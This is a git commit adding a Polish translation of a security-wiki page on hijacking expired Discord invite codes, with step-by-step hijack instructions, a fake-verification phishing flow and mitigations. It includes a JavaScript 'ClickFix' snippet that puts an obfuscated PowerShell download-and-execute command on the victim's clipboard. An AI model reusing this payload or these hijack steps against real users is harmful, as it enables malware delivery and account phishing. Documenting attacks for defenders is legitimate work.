Translated ['src/generic-methodologies-and-resources/phishing-methodolog

2025-10-10 18:36:50 +00:00 · 2025-07-08 19:32:56 +00:00 · 2025-07-08 19:32:56 +00:00 · 7154a7c7b6
commit 7154a7c7b6
parent 3df649db79
2 changed files with 62 additions and 0 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -29,6 +29,7 @@
 - [Phishing Methodology](generic-methodologies-and-resources/phishing-methodology/README.md)
  - [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
  - [Detecting Phishing](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
  - [Discord Invite Hijacking](generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md)
  - [Phishing Files & Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md)
 - [Basic Forensic Methodology](generic-methodologies-and-resources/basic-forensic-methodology/README.md)
  - [Baseline Monitoring](generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md)
--- a/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md
@ -0,0 +1,61 @@
 # Discord Invite Hijacking
 {{#include ../../banners/hacktricks-training.md}}
 Luka w systemie zaproszeń Discorda pozwala aktorom zagrożenia na przejęcie wygasłych lub usuniętych kodów zaproszeń (tymczasowych, stałych lub niestandardowych) jako nowych linków niestandardowych na każdym serwerze z poziomem 3. Normalizując wszystkie kody do małych liter, atakujący mogą wstępnie zarejestrować znane kody zaproszeń i cicho przejąć ruch, gdy oryginalny link wygaśnie lub źródłowy serwer straci swoje wzmocnienie.
 ## Typy zaproszeń i ryzyko przejęcia
 | Typ zaproszenia       | Możliwe przejęcie? | Warunek / Uwagi                                                                                          |
 |-----------------------|---------------------|----------------------------------------------------------------------------------------------------------|
 | Tymczasowy link zaproszenia | ✅                  | Po wygaśnięciu kod staje się dostępny i może być ponownie zarejestrowany jako URL niestandardowy przez wzmocniony serwer. |
 | Stały link zaproszenia | ⚠️                  | Jeśli zostanie usunięty i składa się tylko z małych liter i cyfr, kod może stać się ponownie dostępny.  |
 | Niestandardowy link niestandardowy | ✅                  | Jeśli oryginalny serwer straci swoje wzmocnienie poziomu 3, jego zaproszenie niestandardowe staje się dostępne do nowej rejestracji. |
 ## Kroki eksploatacji
 1. Rozpoznanie
 - Monitoruj publiczne źródła (fora, media społecznościowe, kanały Telegram) w poszukiwaniu linków zaproszeń pasujących do wzoru `discord.gg/{code}` lub `discord.com/invite/{code}`.
 - Zbieraj interesujące kody zaproszeń (tymczasowe lub niestandardowe).
 2. Wstępna rejestracja
 - Utwórz lub użyj istniejącego serwera Discord z uprawnieniami poziomu 3.
 - W **Ustawienia serwera → URL niestandardowy**, spróbuj przypisać docelowy kod zaproszenia. Jeśli zostanie zaakceptowany, kod jest zarezerwowany przez złośliwy serwer.
 3. Aktywacja przejęcia
 - W przypadku tymczasowych zaproszeń, poczekaj, aż oryginalne zaproszenie wygaśnie (lub ręcznie je usuń, jeśli kontrolujesz źródło).
 - W przypadku kodów zawierających wielkie litery, wariant małych liter można przejąć natychmiast, chociaż przekierowanie aktywuje się dopiero po wygaśnięciu.
 4. Ciche przekierowanie
 - Użytkownicy odwiedzający stary link są bezproblemowo kierowani do serwera kontrolowanego przez atakującego, gdy przejęcie jest aktywne.
 ## Przepływ phishingowy przez serwer Discord
 1. Ogranicz kanały serwera, aby tylko kanał **#verify** był widoczny.
 2. Wdróż bota (np. **Safeguard#0786**), aby zachęcał nowicjuszy do weryfikacji za pomocą OAuth2.
 3. Bot przekierowuje użytkowników na stronę phishingową (np. `captchaguard.me`) pod pretekstem kroku CAPTCHA lub weryfikacji.
 4. Wdróż sztuczkę UX **ClickFix**:
 - Wyświetl komunikat o uszkodzonym CAPTCHA.
 - Poprowadź użytkowników do otwarcia okna dialogowego **Win+R**, wklejenia wstępnie załadowanej komendy PowerShell i naciśnięcia Enter.
 ### Przykład wstrzyknięcia ClickFix do schowka
 ```javascript
 // Copy malicious PowerShell command to clipboard
 const cmd = `powershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';` +
 `$u=($r[-1..-($r.Length)]-join '');` +
 `$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));` +
 `iex (iwr -Uri $url)"`;
 navigator.clipboard.writeText(cmd);
 ```
 To podejście unika bezpośrednich pobrań plików i wykorzystuje znane elementy interfejsu użytkownika, aby zmniejszyć podejrzenia użytkowników.
 ## Mitigacje
 - Używaj stałych linków zaproszeń zawierających przynajmniej jedną wielką literę lub znak niealfanumeryczny (nigdy nie wygasają, nie są wielokrotnego użytku).
 - Regularnie zmieniaj kody zaproszeń i unieważniaj stare linki.
 - Monitoruj status boosta serwera Discord i roszczenia do niestandardowych URL-i.
 - Edukuj użytkowników, aby weryfikowali autentyczność serwera i unikali wykonywania poleceń wklejonych ze schowka.
 ## Referencje
 - From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
 - Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link
 {{#include /banners/hacktricks-training.md}}